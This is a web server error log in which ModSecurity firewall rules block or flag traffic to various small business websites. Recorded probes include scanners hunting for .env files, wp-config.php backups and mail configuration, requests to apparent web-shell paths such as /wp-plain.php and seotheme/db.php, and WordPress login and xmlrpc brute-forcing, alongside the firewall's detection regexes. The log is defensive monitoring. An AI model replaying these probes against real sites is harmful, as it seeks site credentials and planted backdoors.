[Tue May 26 18:47:33.962483 2026] [security2:error] [pid 1025417:tid 1025454] [remote 92.205.109.21:59656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdbVHbArxonFeMXvQk4QAAdyQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:47:34.630474 2026] [security2:error] [pid 1025417:tid 1025458] [remote 18.209.220.99:29038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdblHbArxonFeMXvQk7wAAGCg"]
[Tue May 26 18:47:34.873178 2026] [security2:error] [pid 1025417:tid 1025464] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdblHbArxonFeMXvQk_AAALC4"]
[Tue May 26 18:47:34.873397 2026] [security2:error] [pid 1025417:tid 1025591] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdblHbArxonFeMXvQk_AAALC4"]
[Tue May 26 18:47:35.309921 2026] [security2:error] [pid 1025417:tid 1025657] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdb1HbArxonFeMXvQlCQAAAG4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1222983&moderation-hash=db0fb492e761b4787df0b17ec2035da0
[Tue May 26 18:47:35.462153 2026] [security2:error] [pid 1025417:tid 1025655] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdb1HbArxonFeMXvQlAwAAAGw"]
[Tue May 26 18:47:35.560962 2026] [security2:error] [pid 1025417:tid 1025470] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/v1/.env"] [unique_id "ahWdb1HbArxonFeMXvQlEQAAPDQ"]
[Tue May 26 18:47:35.748822 2026] [security2:error] [pid 1025417:tid 1025608] [client 47.128.52.137:57590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/robots.txt"] [unique_id "ahWdb1HbArxonFeMXvQlGQAAAD0"]
[Tue May 26 18:47:36.262587 2026] [security2:error] [pid 1025417:tid 1025661] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdcFHbArxonFeMXvQlKAAAAHI"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1222983&moderation-hash=db0fb492e761b4787df0b17ec2035da0
[Tue May 26 18:47:37.375959 2026] [security2:error] [pid 1025417:tid 1025591] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdcFHbArxonFeMXvQlNQAAACw"]
[Tue May 26 18:47:37.629130 2026] [security2:error] [pid 1025417:tid 1025472] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/dev/.env"] [unique_id "ahWdcVHbArxonFeMXvQlTQAAcTY"]
[Tue May 26 18:47:37.802029 2026] [security2:error] [pid 1025417:tid 1025477] [remote 216.73.216.30:1330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdcVHbArxonFeMXvQlUQAAfTs"]
[Tue May 26 18:47:38.392080 2026] [security2:error] [pid 1025417:tid 1025663] [client 142.44.225.245:59808] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWdclHbArxonFeMXvQlWQAAAHQ"]
[Tue May 26 18:47:38.392206 2026] [security2:error] [pid 1025417:tid 1025663] [client 142.44.225.245:59808] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWdclHbArxonFeMXvQlWQAAAHQ"]
[Tue May 26 18:47:39.534966 2026] [security2:error] [pid 1025417:tid 1025482] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/dashboard/.env"] [unique_id "ahWdc1HbArxonFeMXvQlbwAAJkA"]
[Tue May 26 18:47:39.727891 2026] [security2:error] [pid 1025417:tid 1025563] [client 51.222.95.145:24730] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahWdc1HbArxonFeMXvQlfQAAABA"]
[Tue May 26 18:47:39.728267 2026] [security2:error] [pid 1025417:tid 1025563] [client 51.222.95.145:24730] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahWdc1HbArxonFeMXvQlfQAAABA"]
[Tue May 26 18:47:40.044874 2026] [security2:error] [pid 1025417:tid 1025610] [client 172.69.151.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahWdclHbArxonFeMXvQlZQAAAD8"], referer: https://www.google.com/search?q=hassina-foundation.com
[Tue May 26 18:47:40.142484 2026] [security2:error] [pid 1025417:tid 1025635] [client 85.202.186.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdc1HbArxonFeMXvQlfAAAAFg"]
[Tue May 26 18:47:40.453331 2026] [security2:error] [pid 1025417:tid 1025662] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWddFHbArxonFeMXvQlhgAAAHM"]
[Tue May 26 18:47:41.422117 2026] [security2:error] [pid 1025417:tid 1025490] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.in"] [unique_id "ahWddVHbArxonFeMXvQlqAAAM0g"]
[Tue May 26 18:47:43.096141 2026] [security2:error] [pid 1025417:tid 1025498] [remote 216.73.216.30:33760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdd1HbArxonFeMXvQl2wAAQVA"]
[Tue May 26 18:47:43.381386 2026] [security2:error] [pid 1025417:tid 1025502] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/v3/.env"] [unique_id "ahWdd1HbArxonFeMXvQl5QAAWVQ"]
[Tue May 26 18:47:43.736896 2026] [security2:error] [pid 1025417:tid 1025671] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdd1HbArxonFeMXvQl4QAAAHw"]
[Tue May 26 18:47:44.579100 2026] [security2:error] [pid 1025417:tid 1025651] [client 20.29.64.60:2753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-plain.php"] [unique_id "ahWdeFHbArxonFeMXvQmDwAAAGg"], referer: www.google.com
[Tue May 26 18:47:44.929814 2026] [security2:error] [pid 1025417:tid 1025624] [client 20.29.64.60:2758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWdeFHbArxonFeMXvQmHAAAAE0"], referer: www.google.com
[Tue May 26 18:47:45.281318 2026] [security2:error] [pid 1025417:tid 1025494] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.dist"] [unique_id "ahWdeVHbArxonFeMXvQmIQAALUw"]
[Tue May 26 18:47:45.402534 2026] [security2:error] [pid 1025417:tid 1025516] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdeVHbArxonFeMXvQmJQAAQGI"]
[Tue May 26 18:47:45.402725 2026] [security2:error] [pid 1025417:tid 1025611] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdeVHbArxonFeMXvQmJQAAQGI"]
[Tue May 26 18:47:45.644098 2026] [security2:error] [pid 1025417:tid 1025590] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdeVHbArxonFeMXvQmIAAAACs"]
[Tue May 26 18:47:45.758761 2026] [security2:error] [pid 1025417:tid 1025597] [client 85.11.167.19:60042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shahvishaal.com"] [uri "/.env"] [unique_id "ahWdeVHbArxonFeMXvQmMQAAADI"]
[Tue May 26 18:47:46.869714 2026] [security2:error] [pid 1025417:tid 1025521] [remote 74.206.180.196:43758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdelHbArxonFeMXvQmTQAAamc"]
[Tue May 26 18:47:46.878103 2026] [security2:error] [pid 1025417:tid 1025550] [client 85.11.167.19:60048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shahvishaal.com"] [uri "/"] [unique_id "ahWdelHbArxonFeMXvQmUwAAAAM"]
[Tue May 26 18:47:47.154574 2026] [security2:error] [pid 1025417:tid 1025518] [remote 74.206.180.196:43758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWde1HbArxonFeMXvQmWwAAYGQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:47:47.223498 2026] [security2:error] [pid 1025417:tid 1025431] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/filesystems.php"] [unique_id "ahWde1HbArxonFeMXvQmXwAABw0"]
[Tue May 26 18:47:47.333241 2026] [fcgid:warn] [pid 1025417:tid 1025639] (70014)End of file found: [client 66.132.172.189:2210] mod_fcgid: can't get data from http client
[Tue May 26 18:47:47.826795 2026] [security2:error] [pid 1025417:tid 1025527] [remote 216.73.216.30:33760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWde1HbArxonFeMXvQmcQAAMm0"]
[Tue May 26 18:47:47.828052 2026] [security2:error] [pid 1025417:tid 1025551] [client 85.11.167.19:60050] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shahvishaal.moes-art.com"] [uri "/.env"] [unique_id "ahWde1HbArxonFeMXvQmcgAAAAQ"]
[Tue May 26 18:47:48.745497 2026] [security2:error] [pid 1025417:tid 1025609] [client 85.11.167.19:60062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "shahvishaal.moes-art.com"] [uri "/"] [unique_id "ahWdfFHbArxonFeMXvQmgwAAAD4"]
[Tue May 26 18:47:49.021678 2026] [security2:error] [pid 1025417:tid 1025623] [client 74.7.228.27:37502] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWde1HbArxonFeMXvQmYAAATGk"]
[Tue May 26 18:47:49.101219 2026] [security2:error] [pid 1025417:tid 1025420] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/mail.php"] [unique_id "ahWdfVHbArxonFeMXvQmkAAABwI"]
[Tue May 26 18:47:49.821226 2026] [security2:error] [pid 1025417:tid 1025612] [client 20.29.64.60:2766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWdfVHbArxonFeMXvQmnQAAAEE"]
[Tue May 26 18:47:49.912649 2026] [security2:error] [pid 1025417:tid 1025659] [client 20.29.64.60:2769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/jesqrcmm.php"] [unique_id "ahWdfVHbArxonFeMXvQmngAAAHA"], referer: www.google.com
[Tue May 26 18:47:50.788172 2026] [security2:error] [pid 1025417:tid 1025574] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdflHbArxonFeMXvQmqgAAABs"]
[Tue May 26 18:47:51.128356 2026] [security2:error] [pid 1025417:tid 1025535] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php.orig"] [unique_id "ahWdf1HbArxonFeMXvQmwQAAP3U"]
[Tue May 26 18:47:53.023405 2026] [security2:error] [pid 1025417:tid 1025541] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php"] [unique_id "ahWdgVHbArxonFeMXvQm8AAAdns"]
[Tue May 26 18:47:53.031690 2026] [security2:error] [pid 1025417:tid 1025626] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdgFHbArxonFeMXvQm5gAAAE8"]
[Tue May 26 18:47:53.090535 2026] [security2:error] [pid 1025417:tid 1025543] [remote 216.73.216.30:35276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdgVHbArxonFeMXvQm8gAASX0"]
[Tue May 26 18:47:53.557277 2026] [security2:error] [pid 1025417:tid 1025666] [client 80.241.219.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdgVHbArxonFeMXvQnAgAAAHc"]
[Tue May 26 18:47:53.560657 2026] [security2:error] [pid 1025417:tid 1025586] [client 80.241.219.159:47230] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWdgVHbArxonFeMXvQm-AAAACc"]
[Tue May 26 18:47:54.251537 2026] [security2:error] [pid 1025417:tid 1025579] [client 80.241.219.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdglHbArxonFeMXvQnFQAAACA"]
[Tue May 26 18:47:54.260189 2026] [security2:error] [pid 1025417:tid 1025627] [client 80.241.219.159:47242] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWdglHbArxonFeMXvQnEwAAAFA"]
[Tue May 26 18:47:54.963703 2026] [security2:error] [pid 1025417:tid 1025544] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/index.php"] [unique_id "ahWdglHbArxonFeMXvQnJQAAT34"]
[Tue May 26 18:47:55.304357 2026] [security2:error] [pid 1025417:tid 1025652] [client 20.29.64.60:2773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWdg1HbArxonFeMXvQnMQAAAGk"]
[Tue May 26 18:47:55.318488 2026] [security2:error] [pid 1025417:tid 1025581] [client 20.29.64.60:2783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-plain.php"] [unique_id "ahWdg1HbArxonFeMXvQnMwAAACI"], referer: www.google.com
[Tue May 26 18:47:55.415828 2026] [security2:error] [pid 1025417:tid 1025648] [client 20.29.64.60:2764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWdg1HbArxonFeMXvQnNgAAAGU"], referer: www.google.com
[Tue May 26 18:47:55.832781 2026] [security2:error] [pid 1025417:tid 1025643] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdg1HbArxonFeMXvQnNwAAAGA"]
[Tue May 26 18:47:56.142167 2026] [security2:error] [pid 1025417:tid 1025427] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdhFHbArxonFeMXvQnSgAAXgk"]
[Tue May 26 18:47:56.142366 2026] [security2:error] [pid 1025417:tid 1025641] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdhFHbArxonFeMXvQnSgAAXgk"]
[Tue May 26 18:47:56.860904 2026] [security2:error] [pid 1025417:tid 1025437] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/temp.php"] [unique_id "ahWdhFHbArxonFeMXvQnWwAAbhM"]
[Tue May 26 18:47:57.181947 2026] [security2:error] [pid 1025417:tid 1025594] [client 144.124.237.100:62622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.237.124.144.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdhFHbArxonFeMXvQnXwAAAC8"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 18:47:57.182064 2026] [security2:error] [pid 1025417:tid 1025594] [client 144.124.237.100:62622] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdhFHbArxonFeMXvQnXwAAAC8"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 18:47:57.412664 2026] [security2:error] [pid 1025417:tid 1025553] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdhVHbArxonFeMXvQnYgAAAAY"]
